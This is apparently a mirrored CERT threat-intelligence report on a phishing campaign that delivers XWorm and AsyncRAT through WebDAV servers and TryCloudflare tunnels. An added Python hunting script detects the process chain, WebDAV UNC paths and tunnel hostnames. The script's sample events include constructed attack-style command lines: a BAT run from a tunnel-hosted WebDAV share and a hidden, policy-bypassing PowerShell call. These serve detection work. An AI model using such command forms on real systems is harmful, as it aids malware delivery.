mirror of
https://github.com/cert-orangecyberdefense/cti
synced 2026-06-08 22:47:22 +00:00
5 lines
1.1 KiB
Plaintext
In December 2024, one of our Managed Threat Detection (CyberSOC) clients was impacted by a malicious multistage campaign leveraging WsgiDAV servers to distribute XWorm and AsyncRAT, two notorious commodity malware families.
We assess that this specific campaign has been ongoing since at least early November 2024 and targets France and Germany. That said, it aligns with a larger cluster previously detailed by Proofpoint, Fortinet and Forcepoint researchers, which may have surfaced around February 2024. We currently track this cluster under the “cheesy” name Blue Stylthon.
The infection chain leveraged a phishing email as the initial access vector, likely containing an attachment masquerading as an invoice. We then observed the following execution sequence: LNK > VBS > BAT > PowerShell > ZIP > Python > AsyncRAT/XWorm.
In addition to WsgiDAV servers (WsgiDAV is a generic, extensible WebDAV server written in Python and based on WSGI), the campaign relied on TryCloudflare tunnels to retrieve intermediary payloads (notably the LNK and BAT files), as well as on open-source tools to obfuscate and load the stages (namely Kramer and Donut).
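The execution sequence and delivery infrastructure described above translate directly into hunting logic. The following is an added example, not code from the original report: it walks constructed process-creation telemetry for a wscript > cmd > powershell > python ancestry (the VBS > BAT > PowerShell > Python part of the chain; the LNK itself is opened by explorer.exe and spawns no dedicated process), flags command lines that reference a Windows WebDAV UNC path (`\\host@SSL\DavWWWRoot\...`, the mini-redirector syntax a client uses to reach a WebDAV share), and flags connections to `*.trycloudflare.com`, the hostname suffix of TryCloudflare quick tunnels. All pids, paths, hostnames and command lines in the sample data are constructed for the example and are not indicators from the campaign.

```python
"""Hunt for the LNK > VBS > BAT > PowerShell > Python chain in process telemetry.

Added example, not code from the original report. All events below are
constructed sample data, not real telemetry or indicators from the campaign.
"""
import re

# Constructed process-creation events: (pid, ppid, image path, command line).
# pids 200-500 model the malicious chain; 600-700 model an admin running Python.
PROC_EVENTS = [
    (100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Windows\System32\wscript.exe",
               r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'),                         # VBS stage
    (300, 200, r"C:\Windows\System32\cmd.exe",
               r'cmd.exe /c \\constructed-subdomain.trycloudflare.com@SSL\DavWWWRoot\stage.bat'),  # BAT via WebDAV
    (400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "powershell.exe -w hidden -ep bypass -c <constructed placeholder>"),       # PowerShell stage
    (500, 400, r"C:\Users\u\AppData\Local\Temp\py\python.exe", "python.exe loader.py"),  # Python stage
    (600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),                                # benign
    (700, 600, r"C:\Python312\python.exe", "python.exe report.py"),                       # benign
]

# Constructed network events: (pid, destination host).
NET_EVENTS = [
    (400, "constructed-subdomain.trycloudflare.com"),
    (700, "pypi.org"),
]

# Ordered image names of the VBS > BAT > PowerShell > Python part of the chain.
CHAIN = ["wscript.exe", "cmd.exe", "powershell.exe", "python.exe"]

# Windows WebDAV mini-redirector UNC syntax (\\host@SSL\DavWWWRoot\...) in a command line.
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@ssl)?(?:@\d+)?\\davwwwroot\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Root-first list of image names from the process tree root down to pid."""
    names = []
    while pid in by_pid:
        _, ppid, image, _ = by_pid[pid]
        names.append(basename(image))
        pid = ppid
    return names[::-1]


def is_subsequence(pattern, seq):
    """True if pattern appears in seq in order, allowing gaps (e.g. conhost.exe)."""
    it = iter(seq)
    return all(item in it for item in pattern)


def find_chain_hits(events, chain=CHAIN):
    """Return (pid, 'a > b > c') for every process whose ancestry contains the chain."""
    by_pid = {e[0]: e for e in events}
    hits = []
    for pid, _, image, _ in events:
        if basename(image) == chain[-1]:
            lineage = ancestry(pid, by_pid)
            if is_subsequence(chain, lineage):
                hits.append((pid, " > ".join(lineage)))
    return hits


def find_webdav_cmdlines(events):
    """pids whose command line references a WebDAV UNC path."""
    return [pid for pid, _, _, cmd in events if WEBDAV_UNC.search(cmd)]


def find_tunnel_hosts(net_events, suffix=".trycloudflare.com"):
    """pids contacting a TryCloudflare quick-tunnel hostname."""
    return [pid for pid, host in net_events if host.lower().endswith(suffix)]


if __name__ == "__main__":
    for pid, lineage in find_chain_hits(PROC_EVENTS):
        print(f"chain hit pid={pid}: {lineage}")
    print("webdav cmdlines:", find_webdav_cmdlines(PROC_EVENTS))
    print("tunnel hosts:", find_tunnel_hosts(NET_EVENTS))
```

The ancestry match is a subsequence check rather than a strict parent-child match, so intermediate processes (conhost.exe, a second cmd.exe) do not break the detection, while the benign cmd > python lineage of pid 700 is not reported because no wscript.exe precedes it. The three signals are intentionally kept separate: a chain hit on its own is strong, whereas a single WebDAV UNC path or a TryCloudflare connection is only suspicious in context and is better used to enrich an alert than to raise one.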